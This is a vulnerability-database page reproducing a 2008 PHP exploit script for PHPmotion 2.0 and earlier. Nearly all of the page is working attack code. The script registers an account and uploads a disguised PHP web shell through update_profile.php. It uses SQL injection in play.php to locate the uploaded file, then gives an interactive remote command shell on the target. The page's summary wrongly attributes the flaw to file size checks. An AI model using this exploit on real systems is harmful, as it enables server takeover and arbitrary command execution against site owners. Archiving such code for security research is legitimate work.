Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit

🗓️ 28 Jun 2008 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 37 Views

PHPmotion <= 2.0 Remote Shell Upload Exploit. Vulnerable code in update_profile.php allows remote shell upload due to insufficient file size checks

Code

                                                &lt;?php

/*
	-----------------------------------------------------------------
	PHPmotion&nbsp;&lt;=&nbsp;2.0&nbsp;(update_profile.php)&nbsp;Remote&nbsp;Shell&nbsp;Upload&nbsp;Exploit
	-----------------------------------------------------------------
	
	author...:&nbsp;EgiX
	mail.....:&nbsp;n0b0d13s[at]gmail[dot]com
	
	link.....:&nbsp;http://www.phpmotion.com/
	details..:&nbsp;don't&nbsp;works&nbsp;on&nbsp;windows&nbsp;platforms&nbsp;due&nbsp;to&nbsp;$_FILES['ufile']['tmp_name']&nbsp;is&nbsp;stripslashed

	[-]&nbsp;vulnerable&nbsp;code&nbsp;in&nbsp;/update_profile.php
	
	255.	&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;START&nbsp;OF&nbsp;FILE&nbsp;UPLOAD&nbsp;AND&nbsp;SECURITY&nbsp;CHECK
	256.	&nbsp;&nbsp;&nbsp;&nbsp;$limit_size&nbsp;=&nbsp;$config['maximum_size'];//you&nbsp;can&nbsp;change&nbsp;this&nbsp;to&nbsp;a&nbsp;higher&nbsp;file&nbsp;size&nbsp;limit&nbsp;(this&nbsp;is&nbsp;in&nbsp;bytes&nbsp;=&nbsp;2MB&nbsp;apprx)
	257.	&nbsp;&nbsp;&nbsp;&nbsp;$random&nbsp;=&nbsp;randomcode();//create&nbsp;random&nbsp;number
	258.	&nbsp;&nbsp;&nbsp;&nbsp;$uniquename1&nbsp;=&nbsp;$random&nbsp;.&nbsp;$_FILES['ufile']['name'];//add&nbsp;random&nbsp;number&nbsp;to&nbsp;file&nbsp;name&nbsp;to&nbsp;create&nbsp;unique&nbsp;file
	259.	&nbsp;&nbsp;&nbsp;&nbsp;$uniquename&nbsp;=&nbsp;mysql_real_escape_string($uniquename1);
	260.	&nbsp;&nbsp;&nbsp;&nbsp;$path&nbsp;=&nbsp;installation_paths();
	261.	&nbsp;&nbsp;&nbsp;&nbsp;$path&nbsp;=&nbsp;$path&nbsp;.&nbsp;&quot;/pictures/&quot;&nbsp;.&nbsp;$uniquename;
	262.	
	263.	&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($_FILES)&nbsp;{
	264.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;Store&nbsp;upload&nbsp;file&nbsp;size&nbsp;in&nbsp;$file_size
	265.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$file_size&nbsp;=&nbsp;$_FILES['ufile']['size'];
	266.			//die(&quot;\$file_size&nbsp;=&nbsp;$file_size;&nbsp;\$limit_size&nbsp;=&nbsp;$limit_size;&quot;);
	267.	
	268.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($file_size&nbsp;&gt;=&nbsp;$limit_size)&nbsp;{
	269.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;Display&nbsp;file&nbsp;size&nbsp;error
	270.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;///////////////////////
	271.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$show&nbsp;=&nbsp;1;
	272.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$message_type&nbsp;=&nbsp;$config[&quot;notification_success&quot;];//the&nbsp;messsage&nbsp;displayed&nbsp;at&nbsp;the&nbsp;top&nbsp;coner
	273.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$error_message&nbsp;=&nbsp;'Your&nbsp;image&nbsp;is&nbsp;too&nbsp;large.&nbsp;The&nbsp;maximum&nbsp;size&nbsp;allowed&nbsp;is:&nbsp;'&nbsp;.&nbsp;$config['maximum_size_human_readale'];
	274.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$blk_id&nbsp;=&nbsp;1;//html&nbsp;table&nbsp;-&nbsp;error&nbsp;block
	275.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$template&nbsp;=&nbsp;&quot;templates/main_1.htm&quot;;
	276.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$inner_template1&nbsp;=&nbsp;&quot;templates/inner_myaccount_update_profile.htm&quot;;//middle&nbsp;of&nbsp;page
	277.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$TBS&nbsp;=&nbsp;new&nbsp;clsTinyButStrong;
	278.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$TBS-&gt;NoErr&nbsp;=&nbsp;true;//&nbsp;no&nbsp;more&nbsp;error&nbsp;message&nbsp;displayed.
	279.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$TBS-&gt;LoadTemplate(&quot;$template&quot;);
	280.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$TBS-&gt;Render&nbsp;=&nbsp;TBS_OUTPUT;
	281.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$TBS-&gt;Show();
	282.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
	283.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@mysql_close();
	284.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die();
	285.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
	286.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;{
	287.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$filetype&nbsp;=&nbsp;$_FILES['ufile']['type'];&nbsp;&lt;=======
	288.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($filetype&nbsp;==&nbsp;&quot;image/gif&quot;&nbsp;||&nbsp;$filetype&nbsp;==&nbsp;&quot;image/jpeg&quot;&nbsp;||&nbsp;$filetype&nbsp;==
	289.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;image/pjpeg&quot;)&nbsp;{
	290.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;copy&nbsp;file&nbsp;to&nbsp;where&nbsp;you&nbsp;want&nbsp;to&nbsp;store&nbsp;file
	291.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(@copy($_FILES['ufile']['tmp_name'],&nbsp;$path))&nbsp;{
	292.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
	293.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;{
	294.	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;Display&nbsp;general&nbsp;file&nbsp;copy&nbsp;error
	
	an&nbsp;attacker&nbsp;might&nbsp;be&nbsp;able&nbsp;to&nbsp;upload&nbsp;arbitrary&nbsp;malicious&nbsp;files&nbsp;with&nbsp;.php&nbsp;extension&nbsp;due&nbsp;to&nbsp;the&nbsp;code
	near&nbsp;lines&nbsp;287-289&nbsp;will&nbsp;check&nbsp;only&nbsp;the&nbsp;MIME&nbsp;type&nbsp;of&nbsp;the&nbsp;upload&nbsp;request,&nbsp;that&nbsp;can&nbsp;be&nbsp;easily&nbsp;spoofed!
*/

error_reporting(0);
set_time_limit(0);
ini_set(&quot;default_socket_timeout&quot;,&nbsp;5);

function&nbsp;http_send($host,&nbsp;$packet)
{
	$sock&nbsp;=&nbsp;fsockopen($host,&nbsp;80);
	while&nbsp;(!$sock)
	{
		print&nbsp;&quot;\n[-]&nbsp;No&nbsp;response&nbsp;from&nbsp;{$host}:80&nbsp;Trying&nbsp;again...&quot;;
		$sock&nbsp;=&nbsp;fsockopen($host,&nbsp;80);
	}
	fputs($sock,&nbsp;$packet);
	while&nbsp;(!feof($sock))&nbsp;$resp&nbsp;.=&nbsp;fread($sock,&nbsp;1024);
	fclose($sock);
	return&nbsp;$resp;
}

//&nbsp;yes,&nbsp;SQL&nbsp;injection&nbsp;vulnerable&nbsp;too!
function&nbsp;retrive_data($field,&nbsp;$table,&nbsp;$clause)
{
	global&nbsp;$host,&nbsp;$path;
	
	$sql&nbsp;=&nbsp;&quot;-1/**/UNION/**/SELECT/**/&quot;.str_repeat(&quot;1,&quot;,16).&quot;{$field},&quot;.encodeSQL(&quot;yes&quot;).&quot;,1,1,1/**/FROM/**/{$table}/**/WHERE/**/{$clause}%23&quot;;

	$packet&nbsp;&nbsp;=&nbsp;&quot;GET&nbsp;{$path}play.php?vid={$sql}&nbsp;HTTP/1.0\r\n&quot;;
	$packet&nbsp;.=&nbsp;&quot;Host:&nbsp;{$host}\r\n&quot;;
	$packet&nbsp;.=&nbsp;&quot;Connection:&nbsp;close\r\n\r\n&quot;;

	preg_match(&quot;/play.php\?vid=(.*)\&quot;/&quot;,&nbsp;http_send($host,&nbsp;$packet),&nbsp;$match);
	return&nbsp;$match[1];
}

function&nbsp;encodeSQL($sql)
{
	for&nbsp;($i&nbsp;=&nbsp;0,&nbsp;$n&nbsp;=&nbsp;strlen($sql);&nbsp;$i&nbsp;&lt;&nbsp;$n;&nbsp;$i++)&nbsp;$encoded&nbsp;.=&nbsp;dechex(ord($sql[$i]));
	return&nbsp;&quot;CONCAT(0x{$encoded})&quot;;
}

function&nbsp;upload()
{
	global&nbsp;$host,&nbsp;$path,&nbsp;$sid,&nbsp;$username;

	login();
	
	print&nbsp;&quot;[-]&nbsp;Trying&nbsp;to&nbsp;upload&nbsp;a&nbsp;shell...\n&quot;;
	
	$payload&nbsp;&nbsp;=&nbsp;&quot;--o0oOo0o\r\n&quot;;
	$payload&nbsp;.=&nbsp;&quot;Content-Disposition:&nbsp;form-data;&nbsp;name=\&quot;submitted_pic\&quot;\r\n\r\nyes\r\n&quot;;
	$payload&nbsp;.=&nbsp;&quot;--o0oOo0o\r\n&quot;;
	$payload&nbsp;.=&nbsp;&quot;Content-Disposition:&nbsp;form-data;&nbsp;name=\&quot;ufile\&quot;;&nbsp;filename=\&quot;.php\&quot;\r\n&quot;;
	$payload&nbsp;.=&nbsp;&quot;Content-Type:&nbsp;image/jpeg\r\n\r\n&quot;;
	$payload&nbsp;.=&nbsp;&quot;&lt;?php&nbsp;\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)}&nbsp;?&gt;\r\n&quot;;
	$payload&nbsp;.=&nbsp;&quot;--o0oOo0o--\r\n&quot;;
	
	$packet&nbsp;&nbsp;=&nbsp;&quot;POST&nbsp;{$path}update_profile.php&nbsp;HTTP/1.0\r\n&quot;;
	$packet&nbsp;.=&nbsp;&quot;Host:&nbsp;{$host}\r\n&quot;;
	$packet&nbsp;.=&nbsp;&quot;Cookie:&nbsp;PHPSESSID={$sid}\r\n&quot;;
	$packet&nbsp;.=&nbsp;&quot;Content-Length:&nbsp;&quot;.strlen($payload).&quot;\r\n&quot;;
	$packet&nbsp;.=&nbsp;&quot;Content-Type:&nbsp;multipart/form-data;&nbsp;boundary=o0oOo0o\r\n&quot;;
	$packet&nbsp;.=&nbsp;&quot;Connection:&nbsp;close\r\n\r\n&quot;;
	$packet&nbsp;.=&nbsp;$payload;

	http_send($host,&nbsp;$packet);
	
	$user_id&nbsp;=&nbsp;(int)&nbsp;retrive_data(&quot;user_id&quot;,&nbsp;&quot;member_profile&quot;,&nbsp;&quot;user_name=&quot;.encodeSQL($username));
	$file_name&nbsp;=&nbsp;retrive_data(&quot;file_name&quot;,&nbsp;&quot;pictures&quot;,&nbsp;&quot;user_id={$user_id}&quot;);
	
	if&nbsp;(!isset($file_name))&nbsp;die(&quot;\n[-]&nbsp;Upload&nbsp;failed...\n&quot;);
	else&nbsp;return&nbsp;$file_name;
}

function&nbsp;login()
{
	global&nbsp;$host,&nbsp;$path,&nbsp;$username,&nbsp;$password,&nbsp;$sid;
	
	print&nbsp;&quot;\n[-]&nbsp;Logging&nbsp;in&nbsp;with&nbsp;username&nbsp;'{$username}'&nbsp;and&nbsp;password&nbsp;'{$password}'\n&quot;;
	
	$data	=&nbsp;&quot;user_name_login={$username}&amp;password_login={$password}&amp;submitted=yes&quot;;
	$packet&nbsp;=&nbsp;&quot;POST&nbsp;{$path}login.php&nbsp;HTTP/1.0\r\n&quot;;
	$packet.=&nbsp;&quot;Host:&nbsp;{$host}\r\n&quot;;
	$packet.=&nbsp;&quot;Content-Length:&nbsp;&quot;.strlen($data).&quot;\r\n&quot;;
	$packet.=&nbsp;&quot;Content-Type:&nbsp;application/x-www-form-urlencoded\r\n&quot;;
	$packet.=&nbsp;&quot;Connection:&nbsp;close\r\n\r\n&quot;;
	$packet.=&nbsp;$data;
	$html	=&nbsp;http_send($host,&nbsp;$packet);
	
	preg_match(&quot;/PHPSESSID=([0-9a-f]{32})/i&quot;,&nbsp;$html,&nbsp;$match);
	$sid&nbsp;=&nbsp;$match[1];
	
	if&nbsp;(!preg_match(&quot;/Location:&nbsp;myaccount.php/i&quot;,&nbsp;$html))
	{
		print&nbsp;&quot;[-]&nbsp;Login&nbsp;failed!\n&quot;;
		register();
		login();
	}
}

function&nbsp;register()
{
	global&nbsp;$host,&nbsp;$path,&nbsp;$username,&nbsp;$password;
	
	print&nbsp;&quot;\n[-]&nbsp;Registering&nbsp;new&nbsp;user&nbsp;'{$username}'&nbsp;with&nbsp;password&nbsp;'{$password}'\n&quot;;
	
	//&nbsp;register&nbsp;a&nbsp;new&nbsp;account
	$data	=&nbsp;&quot;user_name={$username}&quot;;
	$data&nbsp;&nbsp;.=&nbsp;&quot;&amp;password={$password}&quot;;
	$data&nbsp;&nbsp;.=&nbsp;&quot;&amp;confirm_password={$password}&quot;;
	$data&nbsp;&nbsp;.=&nbsp;&quot;&amp;email_address=&quot;.md5(time()).&quot;@null.com&quot;;
	$data&nbsp;&nbsp;.=&nbsp;&quot;&amp;form_submitted=yes&quot;;
	$data&nbsp;&nbsp;.=&nbsp;&quot;&amp;terms=yes&quot;;
	$packet&nbsp;=&nbsp;&quot;POST&nbsp;{$path}register.php&nbsp;HTTP/1.0\r\n&quot;;
	$packet.=&nbsp;&quot;Host:&nbsp;{$host}\r\n&quot;;
	$packet.=&nbsp;&quot;Content-Length:&nbsp;&quot;.strlen($data).&quot;\r\n&quot;;
	$packet.=&nbsp;&quot;Content-Type:&nbsp;application/x-www-form-urlencoded\r\n&quot;;
	$packet.=&nbsp;&quot;Connection:&nbsp;close\r\n\r\n&quot;;
	$packet.=&nbsp;$data;
	
	http_send($host,&nbsp;$packet);
	
	$code&nbsp;=&nbsp;retrive_data(&quot;random_code&quot;,&nbsp;&quot;member_profile&quot;,&nbsp;&quot;user_name=&quot;.encodeSQL($username));
	if&nbsp;(!isset($code))&nbsp;die(&quot;\n[-]&nbsp;Registration&nbsp;failed...\n&quot;);
	
	//&nbsp;and&nbsp;confirm&nbsp;the&nbsp;registration
	$packet&nbsp;=&nbsp;&quot;GET&nbsp;{$path}confirm.php?id={$code}&nbsp;HTTP/1.0\r\n&quot;;
	$packet.=&nbsp;&quot;Host:&nbsp;{$host}\r\n&quot;;
	$packet.=&nbsp;&quot;Connection:&nbsp;close\r\n\r\n&quot;;
	
	if&nbsp;(!preg_match(&quot;/registration&nbsp;is&nbsp;now&nbsp;complete/i&quot;,&nbsp;http_send($host,&nbsp;$packet)))&nbsp;die(&quot;\n[-]&nbsp;Registration&nbsp;failed...\n&quot;);
}

print&nbsp;&quot;\n+---------------------------------------------------------------------------+&quot;;
print&nbsp;&quot;\n|&nbsp;PHPmotion&nbsp;&lt;=&nbsp;2.0&nbsp;(update_profile.php)&nbsp;Remote&nbsp;Shell&nbsp;Upload&nbsp;Exploit&nbsp;by&nbsp;EgiX&nbsp;|&quot;;
print&nbsp;&quot;\n+---------------------------------------------------------------------------+\n&quot;;

if&nbsp;($argc&nbsp;&lt;&nbsp;3)
{
	print&nbsp;&quot;\nUsage......:&nbsp;php&nbsp;$argv[0]&nbsp;host&nbsp;path\n&quot;;
	print&nbsp;&quot;\nExample....:&nbsp;php&nbsp;$argv[0]&nbsp;localhost&nbsp;/&quot;;
	print&nbsp;&quot;\nExample....:&nbsp;php&nbsp;$argv[0]&nbsp;localhost&nbsp;/phpmotion/\n&quot;;
	die();
}

$host&nbsp;=&nbsp;$argv[1];
$path&nbsp;=&nbsp;$argv[2];

$username&nbsp;=&nbsp;&quot;pr00f_0f&quot;;
$password&nbsp;=&nbsp;&quot;_c0nc3pt&quot;;

$r_path&nbsp;=&nbsp;&quot;pictures/&quot;.upload();

define(STDIN,&nbsp;fopen(&quot;php://stdin&quot;,&nbsp;&quot;r&quot;));

while(1)
{
	print&nbsp;&quot;\nphpmotion-shell#&nbsp;&quot;;
	$cmd&nbsp;=&nbsp;trim(fgets(STDIN));
	if&nbsp;($cmd&nbsp;!=&nbsp;&quot;exit&quot;)
	{
		$packet&nbsp;=&nbsp;&quot;GET&nbsp;{$path}{$r_path}&nbsp;HTTP/1.0\r\n&quot;;
		$packet.=&nbsp;&quot;Host:&nbsp;{$host}\r\n&quot;;
		$packet.=&nbsp;&quot;Cmd:&nbsp;&quot;.base64_encode($cmd).&quot;\r\n&quot;;
		$packet.=&nbsp;&quot;Connection:&nbsp;close\r\n\r\n&quot;;
		$output&nbsp;=&nbsp;http_send($host,&nbsp;$packet);
		if&nbsp;(!preg_match(&quot;/_code_/&quot;,&nbsp;$output))&nbsp;die(&quot;\n[-]&nbsp;Exploit&nbsp;failed...\n&quot;);
		$shell&nbsp;=&nbsp;explode(&quot;_code_&quot;,&nbsp;$output);
		print&nbsp;&quot;\n{$shell[1]}&quot;;
	}
	else&nbsp;break;
}

?&gt;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Jun 2008 00:00Current
7.1High risk
Vulners AI Score7.1
phpmotionremote shell uploadexploitvulnerable codeupdate_profile.phpinsufficient file size checks
37